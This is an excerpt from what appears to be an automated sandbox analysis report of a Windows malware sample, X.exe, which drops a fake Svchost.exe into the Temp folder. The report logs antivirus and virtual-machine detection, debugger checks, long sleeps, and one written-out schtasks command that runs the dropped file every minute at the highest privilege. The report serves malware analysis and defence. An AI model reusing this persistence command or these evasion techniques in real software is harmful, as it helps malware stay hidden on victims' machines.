                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\X.exeMemory allocated: 920000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\X.exeMemory allocated: 1A560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 28E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1A8E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1A7A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1B3A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 970000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1A4A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1ACB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: DA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1AAA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMemory allocated: 1A9C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\X.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\X.exeWindow / User API: threadDelayed 1095Jump to behavior
                  Source: C:\Users\user\Desktop\X.exeWindow / User API: threadDelayed 8748Jump to behavior
                  Source: C:\Users\user\Desktop\X.exe TID: 2084Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\X.exe TID: 1216Thread sleep count: 1095 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\X.exe TID: 1216Thread sleep count: 8748 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 6628Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 2716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 6552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 2656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 3300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 3896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe TID: 4976Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: X.exe, 00000000.00000002.4057742759.000000001B137000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWnn
                  Source: Amcache.hve.17.drBinary or memory string: VMware
                  Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.17.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                  Source: svchost.exe, 00000012.00000002.4521095412.00000152D005F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521274770.00000152D00DA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.4521120511.00000152D009B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: X.exe, 00000000.00000002.4057742759.000000001B137000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                  Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: X.exe, 00000000.00000002.4057742759.000000001B137000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.17.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000012.00000002.4521816106.00000152D0E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.17.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\X.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972Jump to behavior
                  Source: C:\Users\user\Desktop\X.exeQueries volume information: C:\Users\user\Desktop\X.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Svchost.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: X.exe, 00000000.00000002.4057742759.000000001B0A0000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4057742759.000000001B10D000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4054716755.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4054716755.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\X.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
